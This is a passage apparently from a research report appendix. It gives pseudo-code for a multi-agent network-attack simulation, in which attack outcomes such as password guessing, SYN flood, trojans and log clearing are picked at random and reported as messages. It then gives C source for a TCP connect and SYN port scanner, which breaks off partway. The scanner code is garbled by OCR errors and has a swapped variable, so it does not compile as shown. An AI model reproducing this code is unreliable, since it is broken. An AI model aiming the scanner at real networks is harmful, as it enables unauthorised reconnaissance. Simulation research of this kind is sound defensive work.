      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            DELETEALL (xAttack);
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              REPEAT
                IF (TrusHosts.Exist(TrusHosts.Host=Host.IP)) THEN
                  str="";
                  AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
                  IF (bX) THEN
                    xAttack.Create();
                    xAttack.IsNet=1; xAttack.Name=newAttack.Name;
                    xAttack.SubClass0=newAttack.SubClass0; xAttack.ip=Host.IP;
                    xAttack.TrusHost=TrusHosts.IP;
                  ENDIF;
                ENDIF;
              UNTIL (TrusHosts.Next());
              MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      DELETEALL (xAttack);
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        DELETEALL (xAttack);
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        REPEAT
          IF (TrusHosts.Exist(TrusHosts.Host=Host.IP)) THEN
            str="";
            AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
            IF (bX) THEN
              xAttack.Create();
              xAttack.IsNet=0; xAttack.Name=newAttack.Name;
              xAttack.SubClass0=newAttack.SubClass0; xAttack.ip=Host.IP;
              xAttack.TrusHost=TrusHosts.IP;
            ENDIF;
          ENDIF;
        UNTIL (TrusHosts.Next());
        MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
      ENDIF;
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state ABE of the state machine N

Entry
  Entry action
State action
  Do action (Net_ABE_Do):
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            DELETEALL (xAttack);
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              bY=FALSE;
              REPEAT
                IF (Appl.Exist(Appl.IP=Host.IP)) THEN
                  str="";
                  AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
                  IF (bX) THEN
                    xAttack.Create();
                    xAttack.IsNet=1; xAttack.Name=newAttack.Name;
                    xAttack.SubClass0=newAttack.SubClass0; xAttack.ip=Host.IP;
                    xAttack.Appl=Appl.Name;
                    bY=TRUE;
                  ENDIF;
                ENDIF;
              UNTIL (Appl.Next());
              IF (bY) THEN
                MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
              ENDIF;
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      DELETEALL (xAttack);
      CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      DELETEALL (xAttack);
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        bY=FALSE;
        REPEAT
          IF (Appl.Exist(Appl.IP=Host.IP)) THEN
            str="";
            AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
            IF (bX) THEN
              xAttack.Create(); xAttack.Name=newAttack.Name;
              xAttack.SubClass0=newAttack.SubClass0; xAttack.ip=Host.IP;
              xAttack.Appl=Appl.Name;
              bY=TRUE;
            ENDIF;
          ENDIF;
        UNTIL (Appl.Next());
        IF (bY) THEN
          MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
        ENDIF;
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Script of the “Network agent” behaviour in the state GAR of the state machine N

Entry
  Entry action
State action
  Do action:
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_GAR_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_GAR_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state GAR of the state machine N

Entry
  Entry action
State action
  Do action (Net_GAR_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    str=newAttack.Name;
    IF (bX) THEN
      IF (str="AAF") THEN Attack.Message="Anonymous Access to Ftp-server was gained successfully"; ENDIF;
      IF (str="BFPG") THEN Attack.Message="Brute Force Password Guessing was gained successfully"; ENDIF;
      IF (str="CPF") THEN Attack.Message="PWL file was gained successfully"; ENDIF;
      IF (str="ABTH") THEN Attack.Message="Connection is opened"; ENDIF;
      IF (str="ATH") THEN Attack.Message="Access to a host by r-command login was gained successfully"; ENDIF;
      IF (str="APF") THEN Attack.Message="Access to the Password File was gained successfully"; ENDIF;
      IF (str="CC") THEN Attack.Message="Connection is closed"; ENDIF;
      IF (str="MRF") THEN Attack.Message="IP-address of the attacking Host was written to the File .rhost"; ENDIF;
      IF (str="MUID") THEN Attack.Message="The user's ID is modified"; ENDIF;
      IF (str="WDPF") THEN Attack.Message="The user's identifier was written to the Password File"; ENDIF;
      IF (str="IFS") THEN Attack.Message="The FTP Flood Attack was performed successfully"; ENDIF;
      IF (str="LA") THEN Attack.Message="The Land Attack was performed successfully"; ENDIF;
      IF (str="PD") THEN Attack.Message="The Ping of Death Attack was performed successfully."; ENDIF;
      IF (str="PF") THEN Attack.Message="The Ping Flood Attack was performed successfully"; ENDIF;
      IF (str="SA") THEN Attack.Message="The Smurf Attack was performed successfully."; ENDIF;
      IF (str="SF") THEN Attack.Message="The SYN Flood Attack was performed successfully."; ENDIF;
      IF (str="UF") THEN Attack.Message="The UDP Flooding Attack was performed successfully."; ENDIF;
      IF (str="RAH") THEN Attack.Message="Access was gained successfully"; ENDIF;
      IF (str="AR") THEN Attack.Message="Access was gained successfully"; ENDIF;
      IF (str="UDG") THEN IF (nPar="AR") THEN Attack.Message="User Data are guessed"; ENDIF; ENDIF;
      IF (str="RAM") THEN IF (nPar="UDG") THEN Attack.Message="Registry Access was gained successfully"; ENDIF; ENDIF;
      IF (str="RA") THEN IF (nPar="RAM") THEN Attack.Message="Access to resources was gained successfully"; ENDIF; ENDIF;
      IF (str="FCA") THEN Attack.Message="Access was gained successfully"; ENDIF;
      IF (str="PG") THEN Attack.Message="The password was obtained successfully"; ENDIF;
      IF (str="UPWS") THEN Attack.Message="Access was gained successfully"; ENDIF;
      IF (str="BO") THEN Attack.Message="NetBus is triggered"; ENDIF;
      IF (str="DIMC") THEN Attack.Message="The program Back Orifice is triggered"; ENDIF;
      IF (str="EFE") THEN Attack.Message="The program Back Orifice is triggered"; ENDIF;
      IF (str="MMC") THEN Attack.Message="The Malicious Mobile Code is triggered"; ENDIF;
      IF (str="MP") THEN Attack.Message="The host was accessed. The password was obtained successfully"; ENDIF;
      IF (str="TH") THEN Attack.Message="Trojan Horse was implanted"; ENDIF;
      nPar=str;
      Attack.IsNet=newAttack.IsNet; Attack.Name=str;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state CI of the state machine N

Entry
  Entry action
State action
  Do action (Net_CI_Do):
    IF (newAttack.Name="NS") THEN
      CALLSCRIPT (Net_CI_NS_Do);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_CI_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_CI_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state CI of the state machine N

Entry
  Entry action
State action
  Do action (Net_CI_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="AM") THEN
        IF (Host.Mask!="") THEN (Attack.Mask=Host.Mask); ENDIF;
      ENDIF;
      IF (newAttack.Name="IST") THEN
        IF (Host.SysTime) THEN (Attack.SysTime=Host.SysTime); ENDIF;
      ENDIF;
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Additional script of the “Network agent” behaviour in the state CI of the state machine N (NS attack)

Entry
  Entry action
State action
  Do action (Net_CI_NS_Do):
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            DELETEALL (xAttack);
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              REPEAT
                IF (DNS1.Exist(DNS1.IP=Host.IP)) THEN
                  str=""; AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
                  IF (bX) THEN
                    xAttack.Create(); xAttack.IsNet=1;
                    xAttack.Name=newAttack.Name; xAttack.SubClass0=newAttack.SubClass0;
                    xAttack.ip=Host.IP; xAttack.DNS1HostIP=DNS1.HostIP;
                    xAttack.DNS1HostName=DNS1.HostName;
                  ENDIF;
                ENDIF;
              UNTIL (DNS1.Next());
              MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
              REPEAT
                IF (DNS2.Exist(DNS2.IP=Host.IP)) THEN
                  str=""; AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
                  IF (bX) THEN
                    xAttack.Create(); xAttack.IsNet=1;
                    xAttack.Name=newAttack.Name; xAttack.SubClass0=newAttack.SubClass0;
                    xAttack.ip=Host.IP; xAttack.DNS2DomName=DNS2.DomName;
                    xAttack.DNS2Post=DNS2.Post;
                  ENDIF;
                ENDIF;
              UNTIL (DNS2.Next());
              MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      DELETEALL (xAttack); CALLSCRIPT (Attack_Erase_Do);
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith); RETURN ();
    ENDIF;
    IF (newAttack.IsNet=0) THEN
      DELETEALL (xAttack);
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        REPEAT
          IF (DNS1.Exist(DNS1.IP=Host.IP)) THEN
            str=""; AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
            IF (bX) THEN
              xAttack.Create(); xAttack.IsNet=1;
              xAttack.Name=newAttack.Name; xAttack.SubClass0=newAttack.SubClass0;
              xAttack.ip=Host.IP; xAttack.DNS1HostIP=DNS1.HostIP;
              xAttack.DNS1HostName=DNS1.HostName;
            ENDIF;
          ENDIF;
        UNTIL (DNS1.Next());
        MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
        REPEAT
          IF (DNS2.Exist(DNS2.IP=Host.IP)) THEN
            str=""; AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
            IF (bX) THEN
              xAttack.Create(); xAttack.IsNet=1;
              xAttack.Name=newAttack.Name; xAttack.SubClass0=newAttack.SubClass0;
              xAttack.ip=Host.IP; xAttack.DNS2DomName=DNS2.DomName;
              xAttack.DNS2Post=DNS2.Post;
            ENDIF;
          ENDIF;
        UNTIL (DNS2.Next());
        MESSAGE (xAttack(ALL), InformTemplate, InReplyWith=InMSG.ReplyWith);
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith); RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state EP of the state machine N

Entry
  Entry action
State action
  Do action (Net_EP_Do):
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_EP_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_EP_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state EP of the state machine N

Entry
  Entry action
State action
  Do action (Net_EP_Do2):
    CALLSCRIPT (Attack_Erase_Do);
    str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="PC") THEN
        Attack.Message="The privileges are extended by password cracking";
      ENDIF;
      IF (newAttack.Name="UKE") THEN
        Attack.Message="The privileges are extended by exploits executing";
      ENDIF;
      Attack.IsNet=newAttack.IsNet;
      Attack.Name=newAttack.Name;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state GAD of the state machine N

Entry
  Entry action
State action
  Do action (Net_GAD_Do):
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_GAD_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_GAD_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state GAD of the state machine N

Entry
  Entry action
State action
  Do action (Net_GAD_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="ETR") THEN
        Attack.Message="The trust relations were discovered";
      ENDIF;
      IF (newAttack.Name="SCP") THEN
        Attack.Message="The passwords were obtained";
      ENDIF;
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state CVR of the state machine N

Entry
  Entry action
State action
  Do action (Net_CVR_Do):
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_CVR_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_CVR_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state CVR of the state machine N

Entry
  Entry action
State action
  Do action (Net_CVR_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="FRR") THEN
        Attack.Message="File(s) reading was executed";
      ENDIF;
      IF (newAttack.Name="RBV") THEN
        Attack.Message="File(s) was (were) read";
      ENDIF;
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass1=newAttack.SubClass1; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state IVR of the state machine N

Entry
  Entry action
State action
  Do action (Net_IVR_Do):
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_IVR_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_IVR_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state IVR of the state machine N

Entry
  Entry action
State action
  Do action (Net_IVR_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, str, newAttack.SubClass1, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="DFR") THEN
        Attack.Message="File(s) was (were) read";
      ENDIF;
      IF (newAttack.Name="DBV") THEN
        Attack.Message="File(s) was (were) deleted";
      ENDIF;
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass1=newAttack.SubClass1; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state CT of the state machine N

Entry
  Entry action
State action
  Do action (Net_CT_Do):
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_CT_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_CT_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state CT of the state machine N

Entry
  Entry action
State action
  Do action (Net_CT_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      IF (newAttack.Name="CL") THEN
        Attack.Message="The logs were cleared";
      ENDIF;
      IF (newAttack.Name="HT") THEN
        Attack.Message="Hiding traces tools was successfully executed";
      ENDIF;
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Script of the “Network agent” behaviour in the state CBD of the state machine N

Entry
  Entry action
State action
  Do action:
    IF (newAttack.IsNet=0) THEN
      IF (Host.Exist(Host.IP=newAttack.ip)) THEN
        CALLSCRIPT (Check_Firewall_Do);
        IF (bZ) THEN RETURN (); ENDIF;
        CALLSCRIPT (Net_CBD_Do2);
      ENDIF;
      MESSAGE (Attack, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
    IF (newAttack.IsNet=1) THEN
      IF (LAN.Exist(LAN.IP=newAttack.ip)) THEN
        REPEAT
          IF (Host.Exist(Host.IP!="")) THEN
            CALLSCRIPT (Check_Firewall_Do2);
            IF (NOT bZ) THEN
              CALLSCRIPT (Net_CBD_Do2);
              MESSAGE (Attack, InformTemplate, InReplyWith=InMSG.ReplyWith);
            ENDIF;
          ENDIF;
        UNTIL (Host.Next());
      ENDIF;
      MESSAGE (0, ReplyTemplate, InReplyWith=InMSG.ReplyWith);
      RETURN ();
    ENDIF;
Transitions. Condition / Next state / Action
  End
Exit action


Additional script of the “Network agent” behaviour in the state CBD of the state machine N

Entry
  Entry action
State action
  Do action (Net_CBD_Do2):
    CALLSCRIPT (Attack_Erase_Do); str="";
    AttRandom (newAttack.Name, newAttack.SubClass0, str, str, Host.IP, bX);
    IF (bX) THEN
      Attack.Message="Back doors were created";
      Attack.IsNet=newAttack.IsNet; Attack.Name=newAttack.Name;
      Attack.SubClass0=newAttack.SubClass0; Attack.ip=Host.IP;
    ENDIF;
Transitions. Condition / Next state / Action
Exit action


Appendix 3. Examples of the source codes of network traffic generation programs

A3.1. Source code of program scanports.c

/* using winpcap library version 3.0 alpha 4 */
#include <pcap.h>
/* using libnetnt library version 1.0.2f */
#include <libnet.h>
#include "getopt.h"
/* standard headers needed by the calls below */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

/* maximum length of filter */
#define MAX_FILTER_LENGTH 1024
#define DEFAULT_TIME_OUT 1

/* prototypes of functions */
void usage();

int main(int argc, char **argv) {
    char packet_filter[MAX_FILTER_LENGTH]; /* filter for receiving packets */
    pcap_if_t *alldevs;                    /* network devices */
    pcap_if_t *d;                          /* selected network device */
    int inum=0;                            /* counter */
    int i=0;                               /* counter */
    pcap_t *adhandle;
    char errbuf[PCAP_ERRBUF_SIZE];
    u_int netmask;
    struct bpf_program fcode;
    struct tm *ltime;
    char timestr[16];
    struct libnet_ip_hdr *iph;
    struct libnet_tcp_hdr *tcph;
    u_int ip_len;
    time_t localtime1;                     /* for timeout */
    time_t localtime2;
    u_short bport, eport;                  /* pair of ports */
    u_short cport;                         /* current port */
    int network, packet_size;
    u_long src_ip=0, dst_ip=0;
    u_short dst_beg_prt=0, dst_end_prt=0, cur_prt=0;
    u_char *packet;                        // SYN packet
    u_char *packetRST;                     // RST ACK packet
    int circle = 1;
    int res = 0;
    struct pcap_pkthdr *header;
    u_char *pkt_data;
    u_long seq_number;
    u_long seq_number_from_server;
    u_long ack_number;
    char *source;
    char *destination;
    int timeout = DEFAULT_TIME_OUT;        // timeout in seconds
    u_short src_prt;
    struct libnet_plist_chain plist;       /* chain of ports */
    struct libnet_plist_chain *plist_p;
    char c;
    int j;
    u_char *cp;
    char *scan_types;                      /* type of scan */
    char cur_scan_type = 'n';
    struct sockaddr_in peer;
    WSADATA WSAData;
    int s;                                 /* socket */
    int re;                                /* result */

    /* arguments */
    while((c = getopt(argc, argv, "i:s:d:t:p:h:")) != EOF) {
        switch (c) {
        case 'i':
            /* number of network device */
            inum = atoi(optarg);
            break;
        case 'h':
            /* source ip-address and port */
            /* we expect 'ip.ip.ip.ip.port' */
            if (!(cp = strrchr(optarg, '.'))) {
                usage();
            }
            *cp++ = 0;
            src_prt = (u_short)atoi(cp);
            source = optarg;
            if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
                libnet_error(LIBNET_ERR_FATAL, "Bad source IP address: %s\n", optarg);
            break;
        case 'd':
            /* destination ip-address */
            destination = optarg;
            if((dst_ip = libnet_name_resolve(optarg, 1)) == -1)
                libnet_error(LIBNET_ERR_FATAL, "Bad destination IP address: %s\n", optarg);
            break;
        case 't':
            timeout = atoi(optarg);
            if (timeout < 0) timeout = DEFAULT_TIME_OUT;
            break;
        case 'p':
            /* ports list */
            plist_p = &plist;
            if (libnet_plist_chain_new(&plist_p, optarg) == -1) {
                libnet_error(LIBNET_ERR_FATAL, "libnet_plist_chain_new failed\n");
            }
            break;
        case 's':
            /* type of scan */
            scan_types = optarg;
            cur_scan_type = scan_types[0];
            break;
        }
    }

    if (!src_ip || !src_prt || !dst_ip) usage();
    if (inum == 0) usage();

    /* get a list of network devices */
    if(pcap_findalldevs(&alldevs, errbuf) == -1) {
        fprintf(stderr, "Error in pcap_findalldevs: %s\n", errbuf);
        exit(1);
    }

    /* number of devices */
    for(d=alldevs; d; d=d->next) i++;
    if(i==0) {
        printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
        return -1;

} 

/*  incorrect  device  */ 
if(inum  <111  inum  >  i)  { 

printf("\nlnterface  number  out  of  range. \n"); 

pcap_freealldevs(alldevs); 

return -1; 

I 

/*  set  selected  device  */ 

foil'd  =  alldevs,  i  =  0;  i  <  (inum-1);  d  =  d->next,  i++); 

/*  initialize  random  */ 
if  (libnet_seed_prand()  ==  -1) 
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libnet_error(LIBNET_ERR_FATAL,  "libnet_seed_prand  failed\n"); 

switch  (cur_scan_type)  { 
case  T: 

printf("Starting  scanports  v.  1.0\n"); 
printf("TCP  connect  scan.\n\n"); 

res  =  WSAStartup((WORD)((l  «  8)  I  1),  (LPWSADATA)&WSAData); 
if(res  !=  0){ 

printf("WSAStartup()  error,  program  exits  now\n"); 
exit(O); 

} 

peer.sin_family  =  AF_INET; 

/*  convert  destination  ip -address  from  dotted  format  into  unsigned  long  binary  representation  */ 
peer.sin_addr.s_addr  =  inet_addr(destination); 
while  (libnet_plist_chain_next_pair(plist_p,  &bport,  &eport))  { 
while  (!(bport  >  eport)  &&  bport  !=  0)  { 

s  =  socket! AF_INET,  SOCK_STREAM,  0); 
if(s  ==  IN V ALID_SOCKET)  { 
printf("Error  in  socket  call!\n"); 

WSACleanupO; 

exit(0); 

} 

eport  =  bport++;  /*  current  port  */ 
peer.sin_port  =  htons(cport); 

re  =  connect!  s,  (  struct  sockaddr  *  )&peer,  sizeof(  peer ) ); 
if (re)  { 

printf("%s.%d->%s.%d  TCP  connect:  failed\nPort  is  seems  to  be  CLOSED.\n\n",  source, 
src_prt,  destination,  ntohs(peer.sin_port)); 

}  else  { 

printf("%s.%d->%s.%d  TCP  connect:  success\nPort  is  seems  to  be  OPEN.\n\n",  source, 
src_prt,  destination,  ntohs(peer.sin_port)); 

} 

closesocket(s); 

} 

I 

WSACleanupO; 
break; 
case  'S': 

printf(" Starting  scanports  v.l.0\n"); 

printf("TCP  scanning  by  using  SYN  messages.\n\n"); 

/*  construction  TCP  SYN  and  TCP  RST  ACK  packets  */ 

/*  packet  size:  no  data,  only  TCP  and  IP  headers  */ 
packet_size  =  LIBNET_IP_H  +  LIBNET_TCP_H; 

/*  initialize  network  interface  */ 

network  =  libnet_open_raw_sock(IPPROTO_RAW); 

iffnetwork  ==  -1)  libnet_error!LIBNET_ERR_FATAL,  "Can't  open  network.Vn"); 
libnet_init_packet(packet_size,  &packet); 
